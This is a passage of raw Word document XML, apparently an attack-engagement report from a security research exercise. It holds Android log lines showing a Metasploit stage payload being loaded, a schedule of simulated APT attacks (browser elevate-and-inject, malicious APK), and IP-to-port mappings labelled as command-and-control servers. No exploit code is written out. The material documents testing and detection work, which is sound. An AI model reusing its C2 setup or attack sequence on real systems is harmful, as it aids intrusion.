        <w:t>05-13 04:36:47.436  9499  9499 I dex2oat : type=1400 audit(0.0:2251): avc: denied { connectto } for path="/dev/socket/provmsg" scontext=u:r:untrusted_app_25:s0:c512,c768 tcontext=u:r:provmsgr:s0 tclass=unix_stream_socket permissive=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FA3D9F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.442   603   603 I provmsgr: connection established [286f1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331AE46D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.439   603   603 I provmsgr: type=1400 audit(0.0:2252): avc: denied { read } for name="rmem_max" dev="proc" ino=16832 scontext=u:r:provmsgr:s0 tcontext=u:object_r:proc_net:s0 tclass=file permissive=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B9FBCC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.439   603   603 I provmsgr: type=1400 audit(0.0:2253): avc: denied { open } for path="/proc/sys/net/core/rmem_max" dev="proc" ino=16832 scontext=u:r:provmsgr:s0 tcontext=u:object_r:proc_net:s0 tclass=file permissive=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFD7E8D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.445  9499  9499 E libcsblam32: dynamic linker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DECBEF7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.449  9499  9499 I chatty  : uid=10073(com.metasploit.stage) /system/bin/dex2oat identical 65 lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E66D81B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.449  9499  9499 E libcsblam32: dynamic linker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7D5D80" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.450  1508  8127 E java_lang_TC: CS-WARN: Unable to stat file /data/system_ce/0/snapshots/23.proto due to errno=ENOENT (No such file or directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0678BB3D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.450  9499  9499 I dex2oat : The ClassLoaderContext is a special shared library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B3CE6D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.453  9499  9499 I dex2oat : /system/bin/dex2oat --dex-file=/data/data/com.metasploit.stage/files/r2s3um.jar --output-vdex-fd=41 --oat-fd=42 --oat-location=/data/data/com.metasploit.stage/files/oat/arm64/r2s3um.odex --compiler-filter=quicken --class-loader-context=&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D031F6F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.453  9499  9499 I dex2oat : type=1400 audit(0.0:2254): avc: denied { read } for name="u:object_r:dyninst_prop:s0" dev="tmpfs" ino=18597 scontext=u:r:untrusted_app_25:s0:c512,c768 tcontext=u:object_r:dyninst_prop:s0 tclass=file permissive=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9DE7C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.458   843   843 D instd   : dynamically instrumenting /data/data/com.metasploit.stage/files/r2s3um.jar...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603909F2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.456  9502  9502 I instr   : type=1400 audit(0.0:2257): avc: denied { getattr } for path="/system/bin/sh" dev="dm-0" ino=1642 scontext=u:r:instd:s0 tcontext=u:object_r:shell_exec:s0 tclass=file permissive=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073F6D06" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.519  1508  1518 I zygote64: Background concurrent copying GC freed 353374(11MB) AllocSpace objects, 0(0B) LOS objects, 42% free, 16MB/28MB, paused 78us total 128.225ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27462612" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.636  9502  9502 E libcsblam64: connecting to provmsgr...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492F3E6E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.636   603   603 I provmsgr: connection established [27d21]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347ADD26" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.636  9502  9502 E libcsblam64: ProgramStart: /system/bin/app_process64 [257630]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6882D6D1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.636  9502  9502 E libcsblam64: dynamic linker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E77EBDC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.633  9502  9502 I app_process: type=1400 audit(0.0:2258): avc: denied { write } for name="provmsg" dev="tmpfs" ino=8050 scontext=u:r:instd:s0 tcontext=u:object_r:socket_device:s0 tclass=sock_file permissive=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A05241" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.640  9502  9502 E libcsblam64: dynamic linker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768060DA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.641  9502  9502 I chatty  : uid=10073(com.metasploit.stage) app_process identical 37 lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361071D9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.641  9502  9502 E libcsblam64: dynamic linker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEC65FA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.646  9502  9502 I app_process: type=1400 audit(0.0:2262): avc: denied { getattr } for path="/dev/socket/logdw" dev="tmpfs" ino=16887 scontext=u:r:instd:s0 tcontext=u:object_r:logdw_socket:s0 tclass=sock_file permissive=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619E1395" w14:textId="1B1100FD" w:rsidR="00A351B2" w:rsidRPr="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C14C7">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>05-13 04:36:47.646  9502  9502 I app_process: type=1400 audit(0.0:2263): avc: denied { getattr } for path="/dev/pmsg0" dev="tmpfs" ino=18232 scontext=u:r:instd:s0 tcontext=u:objec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1629BB" w14:textId="359A718B" w:rsidR="00CE2C66" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00CE2C66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:bookmarkStart w:id="90" w:name="_Toc12600047"/>
      <w:r w:rsidR="00CE2C66" w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">05/14/2019 – </w:t>
      </w:r>
      <w:r w:rsidR="002911C2">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Linux Drakon APT and Android Micro APT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="251D6D16" w14:textId="496DC20D" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc12600048"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Schedule</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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475"/>
        <w:gridCol w:w="5865"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="1B232957" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="74EEB16B"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10:08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="04193A34"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TA1 TRACE 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="56DA98C2"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Firefox Drakon APT Elevate Inject</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="7259E98C" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2EF5A06F"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11:45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20189426"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TA1 THEIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="69F836C4"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Firefox Drakon APT (Failed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="638B6195" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7E6192B9"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16:09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0046AE95"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TA1 ClearScope 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="32A448D8"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Barephone APK Micro APT (Failed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="7C2DEC23" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="752B748E"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20:32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1F236D37"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TA1 THEIA 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2D2193C0"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Benign Activity (BinFmt-Elevate Setup)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08C8EE2F" w14:textId="4A2AE4BD" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_ydqknj8jptwm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="93" w:name="_Toc12600049"/>
      <w:bookmarkEnd w:id="92"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="1F66311B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[eth0:1100] 77.138.117.150:80 -&gt; 128.55.12.167:8100</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>clearscope: micro c2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E769CD8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[eth0:1103] 192.196.28.222:80 -&gt; 128.55.12.167:8103</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>trace2: www.yale.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176BE19D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[eth0:1104] 35.106.122.76:80 -&gt; 128.55.12.167:8104</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>trace2: sc server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BB0107" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[eth0:1105] 69.155.209.87:80 -&gt; 128.55.12.167:8105</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>trace3: oc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41233DD6" w14:textId="11B8331D" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[eth0:1106] 153.4.41.7:80 -&gt; 128.55.12.167:8106</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theia: www.nhra.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000821D9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[eth0:1107] 189.141.204.211:80 -&gt; 128.55.12.167:8107</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>theia: sc server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530732E9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>[eth0:1108] 208.203.20.42:80 -&gt; 128.55.12.167:8108</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>theia: oc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5638ED83" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60FC8C09" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">vbash-4.1# ping www.yale.edu                       </w:t>
      </w:r>
